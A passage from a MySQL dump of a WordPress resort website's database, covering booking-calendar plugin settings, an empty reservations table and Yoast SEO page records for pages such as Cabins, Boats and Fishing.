INSERT INTO `ar_wpdevart_extras` VALUES (1,'Extra','{\"extra_field1\":{\"name\":\"extra_field1\",\"label\":\"Adults\",\"required\":\"on\",\"items\":{\"field_item1\":{\"name\":\"field_item1\",\"label\":\"1\",\"operation\":\"+\",\"price_type\":\"price\",\"price_percent\":\"0\"},\"field_item2\":{\"name\":\"field_item2\",\"label\":\"2\",\"operation\":\"+\",\"price_type\":\"price\",\"price_percent\":\"0\"},\"field_item3\":{\"name\":\"field_item3\",\"label\":\"3\",\"operation\":\"+\",\"price_type\":\"price\",\"price_percent\":\"0\"},\"field_item4\":{\"name\":\"field_item4\",\"label\":\"4\",\"operation\":\"+\",\"price_type\":\"price\",\"price_percent\":\"0\"}}},\"extra_field2\":{\"name\":\"extra_field2\",\"label\":\"Children \",\"items\":{\"field_item1\":{\"name\":\"field_item1\",\"label\":\"1\",\"operation\":\"+\",\"price_type\":\"price\",\"price_percent\":\"0\"},\"field_item2\":{\"name\":\"field_item2\",\"label\":\"2\",\"operation\":\"+\",\"price_type\":\"price\",\"price_percent\":\"0\"},\"field_item3\":{\"name\":\"field_item3\",\"label\":\"3\",\"operation\":\"+\",\"price_type\":\"price\",\"price_percent\":\"0\"},\"field_item4\":{\"name\":\"field_item4\",\"label\":\"4\",\"operation\":\"+\",\"price_type\":\"price\",\"price_percent\":\"0\"}}}}',0);
/*!40000 ALTER TABLE `ar_wpdevart_extras` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `ar_wpdevart_forms`
--

DROP TABLE IF EXISTS `ar_wpdevart_forms`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `ar_wpdevart_forms` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `title` varchar(128) NOT NULL,
  `data` text NOT NULL,
  `user_id` int(11) NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `ar_wpdevart_forms`
--

LOCK TABLES `ar_wpdevart_forms` WRITE;
/*!40000 ALTER TABLE `ar_wpdevart_forms` DISABLE KEYS */;
INSERT INTO `ar_wpdevart_forms` VALUES (1,'Form','{\"apply\":\"Apply\",\"form_field1\":{\"type\":\"text\",\"name\":\"form_field1\",\"label\":\"First Name\",\"required\":\"on\"},\"form_field2\":{\"type\":\"text\",\"name\":\"form_field2\",\"label\":\"Last Name\"},\"form_field3\":{\"type\":\"text\",\"name\":\"form_field3\",\"label\":\"Email\",\"required\":\"on\",\"isemail\":\"on\"},\"form_field4\":{\"type\":\"text\",\"name\":\"form_field4\",\"label\":\"Phone\",\"required\":\"on\"},\"form_field5\":{\"type\":\"textarea\",\"name\":\"form_field5\",\"label\":\"Message\",\"required\":\"on\"}}',0);
/*!40000 ALTER TABLE `ar_wpdevart_forms` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `ar_wpdevart_payments`
--

DROP TABLE IF EXISTS `ar_wpdevart_payments`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `ar_wpdevart_payments` (
  `pay_id` int(11) NOT NULL AUTO_INCREMENT,
  `res_id` int(11) NOT NULL,
  `payment_price` float NOT NULL,
  `tax` float NOT NULL,
  `pay_status` varchar(20) NOT NULL,
  `ip` varchar(32) NOT NULL,
  `ipn` varchar(32) NOT NULL,
  `payment_address` varchar(350) NOT NULL,
  `payment_info` text NOT NULL,
  `modified_date` varchar(20) NOT NULL,
  PRIMARY KEY (`pay_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `ar_wpdevart_payments`
--

LOCK TABLES `ar_wpdevart_payments` WRITE;
/*!40000 ALTER TABLE `ar_wpdevart_payments` DISABLE KEYS */;
/*!40000 ALTER TABLE `ar_wpdevart_payments` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `ar_wpdevart_reservations`
--

DROP TABLE IF EXISTS `ar_wpdevart_reservations`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `ar_wpdevart_reservations` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `calendar_id` int(11) NOT NULL,
  `single_day` varchar(16) NOT NULL,
  `check_in` varchar(16) NOT NULL,
  `check_out` varchar(16) NOT NULL,
  `start_hour` varchar(16) NOT NULL,
  `end_hour` varchar(16) NOT NULL,
  `currency` varchar(32) NOT NULL,
  `count_item` int(10) NOT NULL,
  `price` float NOT NULL,
  `total_price` float NOT NULL,
  `extras` text NOT NULL,
  `extras_price` float NOT NULL,
  `form` text NOT NULL,
  `address_billing` text NOT NULL,
  `address_shipping` text NOT NULL,
  `email` varchar(128) NOT NULL,
  `name` varchar(128) NOT NULL,
  `status` varchar(16) NOT NULL,
  `payment_method` varchar(32) NOT NULL,
  `payment_status` varchar(32) NOT NULL,
  `date_created` varchar(64) NOT NULL,
  `is_new` int(1) NOT NULL,
  `sale_percent` varchar(16) NOT NULL,
  `sale_type` varchar(16) NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `ar_wpdevart_reservations`
--

LOCK TABLES `ar_wpdevart_reservations` WRITE;
/*!40000 ALTER TABLE `ar_wpdevart_reservations` DISABLE KEYS */;
/*!40000 ALTER TABLE `ar_wpdevart_reservations` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `ar_wpdevart_themes`
--

DROP TABLE IF EXISTS `ar_wpdevart_themes`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `ar_wpdevart_themes` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `title` varchar(128) NOT NULL,
  `value` longtext NOT NULL,
  `user_id` int(11) NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `ar_wpdevart_themes`
--

LOCK TABLES `ar_wpdevart_themes` WRITE;
/*!40000 ALTER TABLE `ar_wpdevart_themes` DISABLE KEYS */;
INSERT INTO `ar_wpdevart_themes` VALUES (1,'Theme','{\"title\":\"Theme\",\"apply\":\"Apply\",\"date_format\":\"F j, Y\",\"week_days\":\"0\",\"day_start\":\"1\",\"type_days_selection\":\"multiple_days\",\"enable_checkinout\":\"on\",\"enable_number_items\":\"on\",\"terms_cond_link\":\"\",\"enable_form_title\":\"on\",\"enable_extras_title\":\"on\",\"legend_enable\":\"on\",\"legend_available_enable\":\"on\",\"legend_available\":\"Available\",\"legend_booked_enable\":\"on\",\"legend_booked\":\"Booked\",\"legend_unavailable_enable\":\"on\",\"legend_unavailable\":\"Unavailable\",\"action_after_submit\":\"stay_on_calendar\",\"message_text\":\"Thanks for reservation\",\"redirect_url\":\"\",\"currency\":\"USD\",\"calendar_max_width\":\"680\",\"calendar_header_font_weight\":\"normal\",\"calendar_header_font_style\":\"normal\",\"calendar_header_padding\":\"10\",\"next_prev_month_size\":\"15\",\"current_month_size\":\"19\",\"current_year_size\":\"19\",\"week_days_font_weight\":\"normal\",\"week_days_font_style\":\"normal\",\"week_days_size\":\"13\",\"day_number_font_weight\":\"normal\",\"day_number_font_style\":\"normal\",\"day_number_size\":\"13\",\"days_min_height\":\"65\",\"info_font_weight\":\"normal\",\"info_font_style\":\"normal\",\"info_size\":\"13\",\"info_border_radius\":\"\",\"form_title_weight\":\"normal\",\"form_title_style\":\"italic\",\"form_title_size\":\"15\",\"form_labels_weight\":\"normal\",\"form_labels_style\":\"italic\",\"form_labels_size\":\"15\",\"form_fields_weight\":\"normal\",\"form_fields_style\":\"normal\",\"form_fields_size\":\"15\",\"form_submit_weight\":\"normal\",\"form_style_style\":\"normal\",\"calendar_header_bg\":\"#FFFFFF\",\"next_prev_month\":\"#636363\",\"current_month\":\"#636363\",\"current_year\":\"#636363\",\"week_days_bg\":\"#ECECEC\",\"week_days_color\":\"#656565\",\"calendar_bg\":\"#FFFFFF\",\"calendar_border\":\"#ddd\",\"day_number_bg\":\"#ECECEC\",\"day_color\":\"#464646\",\"available_day_number_bg\":\"#85B70B\",\"available_day_color\":\"#FFFFFF\",\"selected_day_number_bg\":\"#373740\",\"selected_day_color\":\"#FFFFFF\",\"unavailable_day_number_bg\":\"#464646\",\"unavailable_day_color\":\"#ECECEC\",\"booked_day_number_bg\":\"#FD7C93\",\"booked_day_color\":\"#FFFFFF\",\"info_icon_color\":\"#FFFFFF\",\"info_bg\":\"#FFFFFF\",\"info_color\":\"#4E4E4E\",\"form_bg\":\"#FDFDFD\",\"form_border\":\"#ddd\",\"form_labels_color\":\"#636363\",\"form_fields_color\":\"#636363\",\"required_star_color\":\"#FD7C93\",\"submit_button_bg\":\"#FD7C93\",\"submit_button_color\":\"#FFFFFF\",\"error_info_bg\":\"#FFFFFF\",\"error_info_color\":\"#C11212\",\"error_info_border\":\"#C11212\",\"error_info_close_bg\":\"#C11212\",\"error_info_close_color\":\"#FFFFFF\",\"successfully_info_bg\":\"#FFFFFF\",\"successfully_info_color\":\"#7FAD16\",\"successfully_info_border\":\"#7FAD16\",\"successfully_info_close_bg\":\"#7FAD16\",\"successfully_info_close_color\":\"#FFFFFF\",\"notify_admin_on_book\":\"on\",\"notify_admin_on_book_to\":\"\\\"Booking calendar\\\" <info@info.info>\",\"notify_admin_on_book_from\":\"[useremail]\",\"notify_admin_on_book_subject\":\"You received a booking request.\",\"notify_admin_on_book_content\":\"\",\"notify_admin_on_approved\":\"on\",\"notify_admin_on_approved_to\":\"\\\"Booking calendar\\\" <info@info.info>\",\"notify_admin_on_approved_from\":\"[useremail]\",\"notify_admin_on_approved_subject\":\"You received a booking request.\",\"notify_admin_on_approved_content\":\"\",\"notify_user_on_book\":\"on\",\"notify_user_on_book_from\":\"\\\"Booking calendar\\\" <info@info.info>\",\"notify_user_on_book_subject\":\"Your booking request has been sent.\",\"user_on_book_content\":\"\",\"notify_user_on_approved\":\"on\",\"notify_user_on_approved_from\":\"\\\"Booking calendar\\\" <info@info.info>\",\"notify_user_on_approved_subject\":\"Your booking request has been approved\",\"notify_user_on_approved_content\":\"\",\"notify_user_canceled\":\"on\",\"notify_user_canceled_from\":\"\\\"Booking calendar\\\" <info@info.info>\",\"notify_user_canceled_subject\":\"Your booking request has been canceled\",\"notify_user_canceled_content\":\"\",\"notify_user_deleted\":\"on\",\"notify_user_deleted_from\":\"\\\"Booking calendar\\\" <info@info.info>\",\"notify_user_deleted_subject\":\"Your booking request has been rejected\",\"notify_user_deleted_content\":\"\",\"for_check_in\":\"Check in\",\"for_check_out\":\"Check out\",\"for_item_count\":\"Item count\",\"for_termscond\":\"I accept to agree to the Terms & Conditions.\",\"for_reservation\":\"Reservation\",\"for_select_days\":\"Please select the days from calendar.\",\"for_price\":\"Price\",\"for_total\":\"Total\",\"for_submit_button\":\"Book Now\",\"for_request_successfully_sent\":\"Your request has been successfully sent. Please wait for approval.\",\"for_request_successfully_received\":\"Your request has been successfully received. We are waiting you!\",\"for_error_single\":\"There are no services available for this day.\",\"for_error_multi\":\"There are no services available for the period you selected.\",\"task\":\"save\",\"id\":\"0\"}',0);
/*!40000 ALTER TABLE `ar_wpdevart_themes` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `ar_wpforms_tasks_meta`
--

DROP TABLE IF EXISTS `ar_wpforms_tasks_meta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `ar_wpforms_tasks_meta` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `action` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `data` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `date` datetime NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=69 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `ar_wpforms_tasks_meta`
--

LOCK TABLES `ar_wpforms_tasks_meta` WRITE;
/*!40000 ALTER TABLE `ar_wpforms_tasks_meta` DISABLE KEYS */;
INSERT INTO `ar_wpforms_tasks_meta` VALUES (1,'wpforms_process_entry_emails_meta_cleanup','Wzg2NDAwXQ==','2020-03-19 01:19:31'),(48,'wpforms_admin_notifications_update','W10=','2020-05-04 20:43:09'),(49,'wpforms_admin_notifications_update','W10=','2020-05-10 19:34:29'),(50,'wpforms_admin_notifications_update','W10=','2020-05-13 00:39:33'),(51,'wpforms_admin_notifications_update','W10=','2020-05-13 00:40:41'),(52,'wpforms_admin_notifications_update','W10=','2020-05-14 17:32:06'),(53,'wpforms_admin_notifications_update','W10=','2020-06-02 00:01:09'),(54,'wpforms_admin_notifications_update','W10=','2020-06-15 13:48:57'),(55,'wpforms_admin_notifications_update','W10=','2020-06-16 20:16:42'),(47,'wpforms_admin_notifications_update','W10=','2020-04-25 14:08:26'),(56,'wpforms_admin_notifications_update','W10=','2020-06-20 16:03:56'),(57,'wpforms_admin_notifications_update','W10=','2020-07-02 01:02:29'),(58,'wpforms_admin_notifications_update','W10=','2020-07-09 17:48:49'),(59,'wpforms_admin_notifications_update','W10=','2020-07-25 01:55:37'),(60,'wpforms_admin_notifications_update','W10=','2020-07-29 18:33:08'),(61,'wpforms_admin_notifications_update','W10=','2020-08-06 01:20:13'),(62,'wpforms_admin_notifications_update','W10=','2020-08-23 11:30:29'),(63,'wpforms_admin_notifications_update','W10=','2020-08-25 12:17:48'),(64,'wpforms_admin_notifications_update','W10=','2020-08-26 20:21:13'),(65,'wpforms_admin_notifications_update','W10=','2020-08-30 20:33:47'),(66,'wpforms_admin_notifications_update','W10=','2020-09-03 01:23:11'),(67,'wpforms_admin_notifications_update','W10=','2020-10-10 13:55:17'),(68,'wpforms_admin_notifications_update','W10=','2020-10-30 18:17:24');
/*!40000 ALTER TABLE `ar_wpforms_tasks_meta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `ar_yoast_indexable`
--

DROP TABLE IF EXISTS `ar_yoast_indexable`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `ar_yoast_indexable` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `permalink` longtext COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `permalink_hash` varchar(40) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `object_id` int(11) unsigned DEFAULT NULL,
  `object_type` varchar(32) COLLATE utf8mb4_unicode_ci NOT NULL,
  `object_sub_type` varchar(32) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `author_id` int(11) unsigned DEFAULT NULL,
  `post_parent` int(11) unsigned DEFAULT NULL,
  `title` text COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `description` mediumtext COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `breadcrumb_title` text COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `post_status` varchar(20) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `is_public` tinyint(1) DEFAULT NULL,
  `is_protected` tinyint(1) DEFAULT 0,
  `has_public_posts` tinyint(1) DEFAULT NULL,
  `number_of_pages` int(11) unsigned DEFAULT NULL,
  `canonical` longtext COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `primary_focus_keyword` varchar(191) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `primary_focus_keyword_score` int(3) DEFAULT NULL,
  `readability_score` int(3) DEFAULT NULL,
  `is_cornerstone` tinyint(1) DEFAULT 0,
  `is_robots_noindex` tinyint(1) DEFAULT 0,
  `is_robots_nofollow` tinyint(1) DEFAULT 0,
  `is_robots_noarchive` tinyint(1) DEFAULT 0,
  `is_robots_noimageindex` tinyint(1) DEFAULT 0,
  `is_robots_nosnippet` tinyint(1) DEFAULT 0,
  `twitter_title` text COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `twitter_image` longtext COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `twitter_description` longtext COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `twitter_image_id` varchar(191) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `twitter_image_source` text COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `open_graph_title` text COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `open_graph_description` longtext COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `open_graph_image` longtext COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `open_graph_image_id` varchar(191) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `open_graph_image_source` text COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `open_graph_image_meta` mediumtext COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `link_count` int(11) DEFAULT NULL,
  `incoming_link_count` int(11) DEFAULT NULL,
  `prominent_words_version` int(11) unsigned DEFAULT NULL,
  `created_at` datetime DEFAULT NULL,
  `updated_at` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp(),
  `blog_id` bigint(20) NOT NULL DEFAULT 1,
  `language` varchar(32) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `region` varchar(32) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `schema_page_type` varchar(64) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `schema_article_type` varchar(64) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `has_ancestors` tinyint(1) DEFAULT 0,
  PRIMARY KEY (`id`),
  KEY `object_type_and_sub_type` (`object_type`,`object_sub_type`),
  KEY `object_id_and_type` (`object_id`,`object_type`),
  KEY `permalink_hash_and_object_type` (`permalink_hash`,`object_type`),
  KEY `subpages` (`post_parent`,`object_type`,`post_status`,`object_id`),
  KEY `prominent_words` (`prominent_words_version`,`object_type`,`object_sub_type`,`post_status`)
) ENGINE=MyISAM AUTO_INCREMENT=37 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `ar_yoast_indexable`
--

LOCK TABLES `ar_yoast_indexable` WRITE;
/*!40000 ALTER TABLE `ar_yoast_indexable` DISABLE KEYS */;
INSERT INTO `ar_yoast_indexable` VALUES (1,NULL,NULL,1,'user',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,0,NULL,NULL,NULL,NULL,NULL,'https://secure.gravatar.com/avatar/78e8a7feb64b9bfceece8ab272f17926?s=500&d=mm&r=g',NULL,NULL,'gravatar-image',NULL,NULL,'https://secure.gravatar.com/avatar/78e8a7feb64b9bfceece8ab272f17926?s=500&d=mm&r=g',NULL,'gravatar-image',NULL,NULL,NULL,NULL,'2020-05-10 19:36:26','2020-11-16 16:41:19',1,NULL,NULL,NULL,NULL,0),(2,'https://ashbyresort.com/','24:c92ad59f470e224b6f43e51208803c21',2,'post','page',1,0,NULL,NULL,'Explore Minnesota','publish',NULL,0,NULL,NULL,NULL,'resort Minnesota vacation Ashby walleye Pelican lake',31,90,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,0,NULL,'2020-05-10 19:36:26','2020-11-16 21:41:35',1,NULL,NULL,NULL,NULL,0),(3,NULL,NULL,46,'post','page',1,0,NULL,NULL,'Motel','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,60,0,NULL,0,NULL,NULL,NULL,NULL,'http://ashbyresort.com/wp-content/uploads/elementor/thumbs/Motel-nmume2smns5ffovkxru2cs4ty7s5as7g50hos13b20.jpg',NULL,NULL,'first-content-image',NULL,NULL,'http://ashbyresort.com/wp-content/uploads/elementor/thumbs/Motel-nmume2smns5ffovkxru2cs4ty7s5as7g50hos13b20.jpg',NULL,'first-content-image',NULL,1,2,NULL,'2020-05-10 20:26:24','2020-11-16 16:41:19',1,NULL,NULL,NULL,NULL,0),(4,NULL,NULL,2,'user',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,NULL,NULL,NULL,NULL,'https://secure.gravatar.com/avatar/b88013b0dff6bdbed154e07aa011ac74?s=500&d=mm&r=g',NULL,NULL,'gravatar-image',NULL,NULL,'https://secure.gravatar.com/avatar/b88013b0dff6bdbed154e07aa011ac74?s=500&d=mm&r=g',NULL,'gravatar-image',NULL,NULL,NULL,NULL,'2020-05-10 21:44:14','2020-11-16 16:41:19',1,NULL,NULL,NULL,NULL,0),(5,NULL,NULL,473,'post','page',2,0,NULL,NULL,'Bird Watching','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,30,0,NULL,0,NULL,NULL,NULL,NULL,'http://ashbyresort.com/wp-content/uploads/2017/01/DSC0111cropped-300x240.jpg',NULL,NULL,'first-content-image',NULL,NULL,'http://ashbyresort.com/wp-content/uploads/2017/01/DSC0111cropped-300x240.jpg',NULL,'first-content-image',NULL,0,0,NULL,'2020-05-10 21:44:14','2020-11-16 16:41:19',1,NULL,NULL,NULL,NULL,0),(6,NULL,NULL,61,'post','page',1,0,NULL,NULL,'Boats','publish',NULL,0,NULL,NULL,NULL,'pontoon, fishing, paddle boat, kayaks',36,60,0,NULL,0,NULL,NULL,NULL,NULL,'http://ashbyresort.com/wp-content/uploads/2018/04/20Foot-300x224.png',NULL,NULL,'first-content-image',NULL,NULL,'http://ashbyresort.com/wp-content/uploads/2018/04/20Foot-300x224.png',NULL,'first-content-image',NULL,0,0,NULL,'2020-05-10 21:45:19','2020-11-16 16:41:19',1,NULL,NULL,NULL,NULL,0),(7,NULL,NULL,31,'post','page',1,0,NULL,NULL,'Map of Grounds','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,'http://ashbyresort.com/wp-content/uploads/2016/03/map.jpg',NULL,NULL,'first-content-image',NULL,NULL,'http://ashbyresort.com/wp-content/uploads/2016/03/map.jpg',NULL,'first-content-image',NULL,0,1,NULL,'2020-05-10 21:47:42','2020-11-16 16:41:19',1,NULL,NULL,NULL,NULL,0),(8,NULL,NULL,37,'post','page',1,0,NULL,NULL,'Lodging','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,60,0,NULL,0,NULL,NULL,NULL,NULL,'http://ashbyresort.com/wp-content/uploads/2016/03/DSC00168-1024x768.jpg',NULL,NULL,'first-content-image',NULL,NULL,'http://ashbyresort.com/wp-content/uploads/2016/03/DSC00168-1024x768.jpg',NULL,'first-content-image',NULL,8,0,NULL,'2020-05-10 21:48:19','2020-11-16 16:41:19',1,NULL,NULL,NULL,NULL,0),(9,NULL,NULL,92,'post','page',1,0,NULL,NULL,'Contact Us','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,60,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,1,0,NULL,'2020-05-10 21:48:30','2020-11-16 16:41:19',1,NULL,NULL,NULL,NULL,0),(10,NULL,NULL,12,'post','page',1,0,NULL,NULL,'About Us','publish',NULL,0,NULL,NULL,NULL,'vacation, walleye, campgrounds, cabin',36,30,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,0,NULL,'2020-05-10 21:48:41','2020-11-16 16:41:19',1,NULL,NULL,NULL,NULL,0),(11,NULL,NULL,789,'post','page',1,0,NULL,NULL,'Cabins','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,60,0,NULL,0,NULL,NULL,NULL,NULL,'http://ashbyresort.com/wp-content/uploads/2017/01/Carly-001.jpg',NULL,NULL,'first-content-image',NULL,NULL,'http://ashbyresort.com/wp-content/uploads/2017/01/Carly-001.jpg',NULL,'first-content-image',NULL,2,0,NULL,'2020-05-10 21:51:04','2020-11-16 16:41:19',1,NULL,NULL,NULL,NULL,0),(12,NULL,NULL,52,'post','page',1,0,NULL,NULL,'New Cabins','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,90,0,NULL,0,NULL,NULL,NULL,NULL,'http://ashbyresort.com/wp-content/uploads/2017/01/DSC05132-1-1024x768.jpg',NULL,NULL,'first-content-image',NULL,NULL,'http://ashbyresort.com/wp-content/uploads/2017/01/DSC05132-1-1024x768.jpg',NULL,'first-content-image',NULL,1,2,NULL,'2020-05-10 21:51:38','2020-11-16 16:41:19',1,NULL,NULL,NULL,NULL,0),(13,NULL,NULL,633,'post','page',1,0,NULL,NULL,'Campgrounds','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,60,0,NULL,0,NULL,NULL,NULL,NULL,'https://ashbyresort.com/wp-content/uploads/2016/03/DSCN3872-1024x768.jpg',NULL,NULL,'first-content-image',NULL,NULL,'https://ashbyresort.com/wp-content/uploads/2016/03/DSCN3872-1024x768.jpg',NULL,'first-content-image',NULL,1,2,NULL,'2020-05-10 21:52:08','2020-11-16 16:41:19',1,NULL,NULL,NULL,NULL,0),(14,NULL,NULL,752,'post','page',1,0,NULL,NULL,'Resort Store','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,30,0,NULL,0,NULL,NULL,NULL,NULL,'http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3679-1024x768.jpg',NULL,NULL,'first-content-image',NULL,NULL,'http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3679-1024x768.jpg',NULL,'first-content-image',NULL,0,0,NULL,'2020-05-10 21:52:33','2020-11-16 16:41:19',1,NULL,NULL,NULL,NULL,0),(15,NULL,NULL,107,'post','page',1,0,NULL,NULL,'Swimming','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,60,0,NULL,0,NULL,NULL,NULL,NULL,'http://ashbyresort.com/wp-content/uploads/2017/01/Fall-Frenzy-001-1024x768.jpg',NULL,NULL,'first-content-image',NULL,NULL,'http://ashbyresort.com/wp-content/uploads/2017/01/Fall-Frenzy-001-1024x768.jpg',NULL,'first-content-image',NULL,0,0,NULL,'2020-05-10 21:52:42','2020-11-16 16:41:19',1,NULL,NULL,NULL,NULL,0),(16,NULL,NULL,43,'post','page',1,0,NULL,NULL,'Rates','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,60,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,0,NULL,'2020-05-10 21:53:50','2020-11-16 16:41:19',1,NULL,NULL,NULL,NULL,0),(17,NULL,NULL,88,'post','page',1,0,NULL,NULL,'Calendar','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,90,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,6,NULL,'2020-05-10 21:55:45','2020-11-16 16:41:19',1,NULL,NULL,NULL,NULL,0),(18,NULL,NULL,81,'post','page',1,0,NULL,NULL,'Fishing','publish',NULL,0,NULL,NULL,NULL,'walleye, fishing',28,90,0,NULL,0,NULL,NULL,NULL,NULL,'http://ashbyresort.com/wp-content/uploads/2019/09/69361252_2574110649319471_116474079933890560_n-2.jpg',NULL,NULL,'first-content-image',NULL,NULL,'http://ashbyresort.com/wp-content/uploads/2019/09/69361252_2574110649319471_116474079933890560_n-2.jpg',NULL,'first-content-image',NULL,0,0,NULL,'2020-05-10 21:57:25','2020-11-16 16:41:19',1,NULL,NULL,NULL,NULL,0),(19,NULL,NULL,NULL,'system-page','404',NULL,NULL,'Page not found %%sep%% %%sitename%%',NULL,NULL,NULL,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,0,1,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2020-05-10 22:05:30','2020-08-06 05:22:32',1,NULL,NULL,NULL,NULL,0),(20,NULL,NULL,837,'post','page',1,0,NULL,NULL,'CSV Calendar','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,30,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,1,0,NULL,'2020-05-10 23:01:11','2020-11-16 16:41:19',1,NULL,NULL,NULL,NULL,0),(21,NULL,NULL,40,'post','page',1,0,NULL,NULL,'Amenities','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,60,0,NULL,0,NULL,NULL,NULL,NULL,'http://ashbyresort.com/wp-content/uploads/2019/04/Screen-Shot-2019-04-09-at-8.03.24-PM.png',NULL,NULL,'first-content-image',NULL,NULL,'http://ashbyresort.com/wp-content/uploads/2019/04/Screen-Shot-2019-04-09-at-8.03.24-PM.png',NULL,'first-content-image',NULL,0,0,NULL,'2020-05-11 01:19:51','2020-11-16 16:41:19',1,NULL,NULL,NULL,NULL,0),(22,NULL,NULL,64,'post','page',1,0,NULL,NULL,'Biking','publish',NULL,0,NULL,NULL,NULL,'Biking',33,90,0,NULL,0,NULL,NULL,NULL,NULL,'http://ashbyresort.com/wp-content/uploads/2016/03/DSCN2718-1024x768.jpg',NULL,NULL,'first-content-image',NULL,NULL,'http://ashbyresort.com/wp-content/uploads/2016/03/DSCN2718-1024x768.jpg',NULL,'first-content-image',NULL,0,0,NULL,'2020-05-11 01:24:21','2020-11-16 